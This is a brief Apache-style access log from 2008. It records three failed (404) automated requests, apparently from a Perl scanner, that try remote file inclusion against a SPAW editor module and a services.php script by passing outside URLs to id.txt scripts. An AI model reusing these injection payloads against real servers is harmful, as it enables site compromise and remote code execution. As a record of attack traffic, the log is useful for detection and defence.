66.70.70.169 - - [04/Feb/2008:06:10:03 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://prevecamformacion.com/images/.md/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.70.70.169 - - [04/Feb/2008:06:10:03 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://prevecamformacion.com/images/.md/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.220.215.212 - - [04/Feb/2008:06:10:37 -0800] "GET /logs/access_080108.log/services.php?page=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
